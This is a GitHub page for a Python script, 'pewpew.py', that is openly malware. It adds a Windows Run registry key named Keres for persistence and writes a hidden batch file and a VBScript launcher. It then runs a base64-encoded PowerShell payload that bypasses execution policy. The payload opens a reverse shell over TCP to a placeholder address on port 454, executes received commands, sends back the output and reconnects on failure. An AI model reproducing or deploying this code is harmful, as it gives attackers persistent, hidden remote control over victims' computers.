-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathpewpew.py
55 lines (29 loc) · 8.31 KB
/
pewpew.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import subprocess
import os
home_directory = os.path.expanduser("~")
batch_file_path = os.path.join(home_directory, 'Keres.bat')
vbs_script_path = os.path.join(home_directory, 'ExecKeres.vbs')
vbs_script_content = f'''
Set objShell = CreateObject("WScript.Shell")
batchFilePath = "{batch_file_path}"
objShell.Run batchFilePath, 0, True
'''
#""""""""""""""""""""""""""""""""""""""""""""""""""
ps_command = ''' CgAkAHUAbgBpAHEAdQBlAEkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAAIgBLAGUAcgBlAHMAIgAKACQAbQBhAHgAUAByAG8AYwBlAHMAcwBlAHMAIAA9ACAAMQAKACQAcwBwAGEAdwBuAGUAZABQAHIAbwBjAGUAcwBzAGUAcwAgAD0AIAAwAAoACgB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsACgAgACAAIAAgACQAaQBzAFIAdQBuAG4AaQBuAGcAIAA9ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8ALgBDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIAAtAGwAaQBrAGUAIAAiACoAJAB1AG4AaQBxAHUAZQBJAGQAZQBuAHQAaQBmAGkAZQByACoAIgAgAH0ACgAKACAAIAAgACAAaQBmACAAKAAtAG4AbwB0ACAAJABpAHMAUgB1AG4AbgBpAG4AZwAgAC0AYQBuAGQAIAAkAHMAcABhAHcAbgBlAGQAUAByAG8AYwBlAHMAcwBlAHMAIAAtAGwAdAAgACQAbQBhAHgAUAByAG8AYwBlAHMAcwBlAHMAKQAgAHsACgAgACAAIAAgACAAIAAgACAAJABjAG8AbgBuAGUAYwB0AGkAbwBuAFQAZQBzAHQAIAA9ACAAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAtAEMAbwBtAHAAdQB0AGUAcgBOAGEAbQBlACAAJwAwAC4AMAAuADAALgAwACcAIAAtAEMAbwB1AG4AdAAgADEAIAAtAFEAdQBpAGUAdAAKAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABjAG8AbgBuAGUAYwB0AGkAbwBuAFQAZQBzAHQAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABQAFMASABPAE0ARQBcAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHUAbgBpAHEAdQBlAEkAZABlAG4AdABpAGYAaQBlAHIACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAAQwBsAGkAZQBuAHQACgAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdAByAHkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwBsAGkAZQBuAHQALgBDAG8AbgBuAGUAYwB0ACgAJwAwAC4AMAAuADAALgAwACcALAAgADQANQA0ACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApAAoACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoAC0AbgBvAHQAIAAkAGMAbABpAGUAbgB0AC4AQwBvAG4AbgBlAGMAdABlAGQAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEMAbwBuAG4AZQBjAHQAaQBvAG4AIABsAG8AcwB0AC4AIABSAGUAYwBvAG4AbgBlAGMAdABpAG4AZwAuAC4ALgAiAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAIAAgACMAIABXAGEAaQB0ACAAZgBvAHIAIAA2ADAAIABzAGUAYwBvAG4AZABzACAAYgBlAGYAbwByAGUAIABhAHQAdABlAG0AcAB0AGkAbgBnACAAdABvACAAcgBlAGMAbwBuAG4AZQBjAHQACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACgAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgADYANQA1ADMANQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkACgAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABpACAALQBsAGUAIAAwACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBDAG8AbgBuAGUAYwB0AGkAbwBuACAAdABvACAAcwBlAHIAdgBlAHIAIABjAGwAbwBzAGUAZAAuACAAUgBlAGMAbwBuAG4AZQBjAHQAaQBuAGcALgAuAC4AIgAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgAwACAAIAAjACAAVwBhAGkAdAAgAGYAbwByACAANgAwACAAcwBlAGMAbwBuAGQAcwAgAGIAZQBmAG8AcgBlACAAYQB0AHQAZQBtAHAAdABpAG4AZwAgAHQAbwAgAHIAZQBjAG8AbgBuAGUAYwB0AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AAoACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGQAYQB0AGEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABpACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACkALgBQAGEAdABoACAAKwAgACcAPgAgACcACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAgADAALAAgACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0AIABjAGEAdABjAGgAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEUAcgByAG8AcgA6ACAAJABfACIACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0AIABmAGkAbgBhAGwAbAB5ACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAcwB0AHIAZQBhAG0AKQAgAHsAIAAkAHMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAgAH0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGMAbABpAGUAbgB0ACkAIAB7ACAAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkAIAB9AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4ACgAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcwBwAGEAdwBuAGUAZABQAHIAbwBjAGUAcwBzAGUAcwArACsACgAgACAAIAAgACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIATgBvACAAYwBvAG4AbgBlAGMAdABpAG8AbgAgAHQAbwAgAHQAaABlACAAcwBlAHIAdgBlAHIALgAgAFMAawBpAHAAcABpAG4AZwAgAHAAcgBvAGMAZQBzAHMAIABzAHAAYQB3AG4ALgAiAAoAIAAgACAAIAAgACAAIAAgAH0ACgAgACAAIAAgAH0AIABlAGwAcwBlAGkAZgAgACgAJABzAHAAYQB3AG4AZQBkAFAAcgBvAGMAZQBzAHMAZQBzACAALQBnAGUAIAAkAG0AYQB4AFAAcgBvAGMAZQBzAHMAZQBzACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAE0AYQB4AGkAbQB1AG0AIABuAHUAbQBiAGUAcgAgAG8AZgAgAHAAcgBvAGMAZQBzAHMAZQBzACAAcgBlAGEAYwBoAGUAZAAuACAAUwBrAGkAcABwAGkAbgBnACAAcAByAG8AYwBlAHMAcwAgAHMAcABhAHcAbgAuACIACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAAIAAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBTAGMAcgBpAHAAdAAgAGkAcwAgAGEAbAByAGUAYQBkAHkAIAByAHUAbgBuAGkAbgBnAC4AIgAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAjACAAQwBvAHUAbgB0ACAAcAByAG8AYwBlAHMAcwBlAHMAIABhAGYAdABlAHIAIABhACAANgAwAC0AcwBlAGMAbwBuAGQAIAB3AGEAaQB0AAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAACgAgACAAIAAgACQAcwBwAGEAdwBuAGUAZABQAHIAbwBjAGUAcwBzAGUAcwAgAD0AIAAoAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AQwBvAG0AbQBhAG4AZABMAGkAbgBlACAALQBsAGkAawBlACAAIgAqACQAdQBuAGkAcQB1AGUASQBkAGUAbgB0AGkAZgBpAGUAcgAqACIAIAB9ACkALgBDAG8AdQBuAHQACgB9AAoACgA='''
#stp
command=f'''@echo off
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand {ps_command}
'''
# """"""""""""""""""
try:
subprocess.run(args=["reg", "add", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"/v", "Keres", "/t", "REG_SZ", "/d", f"{vbs_script_path}", "/f"], shell=True)
with open(batch_file_path, 'w') as batch_file:
batch_file.write(command)
with open(vbs_script_path, 'w') as vbs_script:
vbs_script.write(vbs_script_content)
print(f"VBScript file created at: {vbs_script_path}")
subprocess.run(["wscript", vbs_script_path])
print("PowerShell command executed successfully.")
except subprocess.CalledProcessError as e:
print("Error executing PowerShell command:", e)